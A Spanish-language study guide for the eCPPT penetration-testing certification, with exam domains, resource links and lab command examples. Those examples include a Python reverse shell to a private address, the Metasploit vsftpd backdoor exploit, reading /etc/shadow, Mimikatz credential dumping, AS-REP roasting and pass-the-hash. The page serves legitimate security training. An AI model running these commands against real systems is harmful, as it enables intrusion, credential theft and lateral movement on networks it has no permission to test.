eCPPT
Descripción
El eLearnSecurity Certified Professional Penetration Tester (eCPPT) es una certificación orientada a profesionales de la seguridad que desean demostrar competencias prácticas en pruebas de penetración. La certificación valida habilidades en evaluación de seguridad de redes, aplicaciones web, explotación de vulnerabilidades y reportes profesionales.
- Duración del curso: Variable según modalidad.
- Modalidad: Online, práctico y basado en laboratorio.
- Enfoque: Ejercicios hands-on y escenarios de pentesting reales.
- Reconocimiento: Internacional, orientado a la práctica más que a la teoría.
Objetivos de la certificación
- Identificar y explotar vulnerabilidades en sistemas y aplicaciones.
- Aplicar metodologías profesionales de pentesting.
- Elaborar informes de seguridad claros, técnicos y profesionales.
- Mejorar la capacidad de análisis y resolución de problemas en entornos controlados de pruebas.
Contenido clave
- Reconocimiento y Enumeración
- Descubrimiento de hosts y servicios.
- Escaneo de puertos y fingerprinting.
- Explotación
- Explotación de servicios vulnerables.
- Escalada de privilegios en sistemas Windows y Linux.
- Post-explotación
- Mantenimiento de acceso.
- Exfiltración de información.
- Pentesting Web
- SQL Injection, XSS, CSRF y vulnerabilidades de lógica de negocio.
- Uso de herramientas: Burp Suite, OWASP ZAP.
- Reportes
- Documentación de hallazgos.
- Recomendaciones de mitigación y comunicación a clientes.
Metodología de estudio
- Laboratorios prácticos: Cada módulo contiene escenarios de práctica para replicar entornos reales.
- Examen práctico: Incluye una máquina o laboratorio que debe ser explotado y reportado.
- Notas y recursos comunitarios: Acceso a repositorios con ejercicios, scripts y guías.
Recursos y notas de estudio
- eCPPT Certification - INE Security
- GitHub - dev-angelist/eCPPTv2-PTP-Notes: INE/eLearnSecurity Certified Professional Penetration Tester (eCPPT) / PTP v2 Notes
- GitHub - calacuda/eCPPT-resources: A compilation of resources for studying for the eCPPTv2
- GitHub - Certs-Study/eCPPTv2-Penetration-Testing-Professional: Study notes to get eCPPT Certification. Join the community on Discord
- GitHub - Cyber-Security-Certifications/eCPPTv2-Notes-AIO: All binaries, tools, wordlists and tutorials you need to pass eCPPTv2 - For Free!
- GitHub - 0xMat10/eCPPT_Prep: This repo contains Machines and Notes for practicing for eCPPTv2 exam
- GitHub - Dragkob/eCPPT: INE eCPPTv3 Cheat Sheet / Course Notes. Comprehensive course notes and cheat sheets for eCPPTv3
Consejos de preparación
- Practicar en entornos controlados y máquinas virtuales.
- Leer y analizar reportes de pruebas de otros profesionales.
- Mantenerse actualizado con vulnerabilidades recientes y herramientas de pentesting.
- Participar en comunidades y foros para resolver dudas y compartir experiencias.
- Realizar ejercicios de escalada de privilegios, explotación y post-explotación regularmente.
Enlaces relacionados
- Pentesting
- certificaciones
Temario completo de la certificación eCPPT
1. Información general del temario
El temario oficial de la certificación eCPPT (Certified Professional Penetration Tester) se organiza en dominios y sub‑dominios prácticos que cubren todo el proceso de pruebas de penetración: desde reconocimiento hasta explotación, post‑explotación y reporte profesional. El enfoque es 100% práctico, con énfasis en escenarios reales de pentesting.
2. Dominios del examen (Estructura oficial)
2.1. Information Gathering & Reconnaissance (10%)
- Descubrimiento de hosts y servicios (Host Discovery).
- Escaneo de puertos y servicios (Port Scanning).
- Enumeración de información de servicios abiertos (service enumeration).
- Enumeración DNS y técnicas avanzadas de reconocimiento.
2.2. Initial Access (15%)
- Enumeración de usuarios para identificar cuentas válidas.
- Técnicas de password spraying y ataques de fuerza bruta contra servicios de acceso remoto.
- Técnicas de acceso inicial a sistemas internos.
2.3. Web Application Penetration Testing (15%)
- Enumeración y análisis de aplicaciones web para identificar puntos de entrada.
- Detección y explotación de vulnerabilidades comunes:
- SQL Injection (SQLi).
- Cross‑Site Scripting (XSS).
- Command Injection y otras inyecciones.
- Ataques de fuerza bruta en formularios de autenticación.
- Explotación de componentes vulnerables o desactualizados.
- Exfiltración de datos de aplicaciones y bases de datos.
2.4. Exploitation & Post‑Exploitation (25%)
- Identificación y explotación de vulnerabilidades o malas configuraciones en servicios.
- Escalada de privilegios local: Windows y Linux.
- Dumping y cracking de hashes de contraseñas.
- Identificación y extracción de credenciales inseguras almacenadas localmente.
- Persistencia y técnicas de post‑explotación (mantener acceso).
2.5. Exploit Development (5%)
- Desarrollo o modificación de código de exploit para acceso inicial y post‑explotación.
- Identificación y explotación de vulnerabilidades de corrupción de memoria (Stack/Buffer Overflows).
- Técnicas básicas de debugging para exploits.
2.6. Active Directory Penetration Testing (30%)
- Enumeración completa de entornos Active Directory.
- Identificación de cuentas de dominio con contraseñas débiles o vacías.
- Ataques Kerberos: AS‑REP Roasting, Pass‑the‑Hash, Pass‑the‑Ticket.
- Técnicas de movimiento lateral dentro de la red.
- Obtención de privilegios de Domain Admin y explotación a nivel dominio.
3. Contenidos temáticos extendidos (basados en curso/recursos)
3.1. Reconocimiento y Scanning
- Técnicas avanzadas de reconocimiento (DNS enum, servicio fingerprinting).
- Uso de herramientas: Nmap, Masscan, enum4linux, etc.
3.2. Pentesting de Aplicaciones Web
- OWASP Top 10 enfoque práctico.
- Uso de Burp Suite, sqlmap, wfuzz.
- Validación y explotación manual vs automatizada.
3.3. Explotación de Sistemas
- Técnicas de explotación en Linux y Windows: Pipes, Shells inversos.
- Uso de Metasploit y módulos avanzados.
3.4. PowerShell y Scripting
- Uso de PowerShell para enumeración y post‑explotación.
- Scripts de automatización para tareas de pentesting.
3.5. Wi‑Fi y Redes Inalámbricas
- Fundamentos de 802.11.
- Ataques comunes de Wi‑Fi (de autenticación, fuerza bruta).
3.6. Técnicas Avanzadas de Reporte
- Formato profesional de reporte de pentesting.
- Impacto, PoC (Proof of Concept) y recomendaciones de mitigación.
4. Laboratorios y prácticas
- Laboratorios prácticos hands‑on para aplicar cada dominio del temario.
- Escenarios reales de pentesting con múltiples vectores de ataque.
- Integración de flujos completos: reconocimiento → explotación → escalada → reporte.
5. Requisitos previos y habilidades
- Buen entendimiento de sistemas operativos Windows y Linux.
- Conocimientos sólidos de redes y protocolos TCP/IP.
- Experiencia con herramientas de pentesting.
- Habilidades de scripting básico y lectura/modificación de código.
6. Fuentes oficiales y recursos
- Pentesting
- certificaciones
- eCPPT Certification - INE Security
- GitHub - dev-angelist/eCPPTv2-PTP-Notes
- GitHub - calacuda/eCPPT-resources
- GitHub - Certs-Study/eCPPTv2-Penetration-Testing-Professional
- GitHub - Cyber-Security-Certifications/eCPPTv2-Notes-AIO
- GitHub - 0xMat10/eCPPT_Prep
- GitHub - Dragkob/eCPPT (v3 notes)
Guía de implementaciones para eCPPT: Casos de uso y ejemplos de configuración
1. Reconocimiento y Enumeración
Caso de uso
Descubrir hosts activos y servicios abiertos en una red corporativa antes de realizar un pentest.
Herramientas y ejemplos
- Nmap
- Escaneo rápido de red:
nmap -sP 192.168.1.0/24
- Escaneo de puertos y servicios con detección de versión:
nmap -sV -p 1-65535 192.168.1.10
- enum4linux (enumeración de usuarios y shares en sistemas Windows):
enum4linux -a 192.168.1.10
- DNS Recon
- Enumeración de subdominios con sublist3r:
sublist3r -d ejemplo.com
2. Pentesting Web
Caso de uso
Identificar vulnerabilidades de inyección en una aplicación web de prueba.
Herramientas y ejemplos
- Burp Suite
- Configuración de Proxy:
- Puerto local: 8080
- Interceptar tráfico de navegador para pruebas.
- Configuración de Proxy:
- SQLMap
- Detección y explotación de SQL Injection:
sqlmap -u "http://ejemplo.com/login.php" --forms --batch --risk=3 --level=5
- wfuzz
- Fuerza bruta de parámetros o directorios:
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://ejemplo.com/FUZZ
3. Explotación de Sistemas
Caso de uso
Acceso inicial a un host Linux vulnerable y escalada de privilegios.
Herramientas y ejemplos
- Metasploit Framework
- Escaneo de vulnerabilidad y explotación:
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.1.15
run
```
- **Shell inversa en Python**:
```python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("192.168.1.20",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
4. Post-explotación
Caso de uso
Recolectar información sensible y mantener persistencia en un host comprometido.
Herramientas y ejemplos
- Linux
- Escalado de privilegios:
sudo -l
find / -perm -4000 2>/dev/null
- Dumping de contraseñas:
grep -i password /etc/shadow
- Windows
- PowerShell para enumerar usuarios:
Get-LocalUser
Get-LocalGroupMember Administrators
- Obtención de hashes con mimikatz:
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords" "exit"'
```
---
## 5. Active Directory Pentesting
### Caso de uso
Movimientos laterales y escalada en un entorno AD para pruebas internas.
### Herramientas y ejemplos
- **BloodHound**
- Analizar relaciones de privilegios en AD:
```powershell
Invoke-BloodHound -CollectionMethod All -Domain ejemplo.local -ZipFileName data.zip
- Kerberos Attacks
- AS-REP Roasting:
GetNPUsers.py ejemplo.local/ -usersfile users.txt
- Pass-the-Hash:
bash
impacket-psexec -hashes <LMHASH>:<NTHASH> user@192.168.1.10
6. Reporting y Documentación
Caso de uso
Generar informes profesionales con hallazgos y recomendaciones.
Ejemplo de estructura de reporte
- Resumen ejecutivo: Hallazgos críticos y riesgos para el negocio.
- Metodología: Técnicas y herramientas utilizadas.
- Hallazgos técnicos: Vulnerabilidades, pruebas PoC, capturas de pantalla.
- Recomendaciones: Remediaciones y mitigaciones.
- Apéndices: Scripts, logs y evidencias técnicas.
7. Laboratorios prácticos
- Configurar VMs de laboratorio con Windows y Linux.
- Implementar escenarios de vulnerabilidades intencionadas para prácticas de explotación.
- Integrar flujos completos: Reconocimiento → Explotación → Escalada → Reporte.
8. Buenas prácticas
- Mantener un entorno aislado para pruebas.
- Documentar cada paso y comando utilizado.
- Realizar pruebas repetidas y controladas para validar hallazgos.
- Actualizar herramientas y scripts antes de cada laboratorio.
Recursos y referencias
¿Te gusta este contenido? Suscríbete vía RSS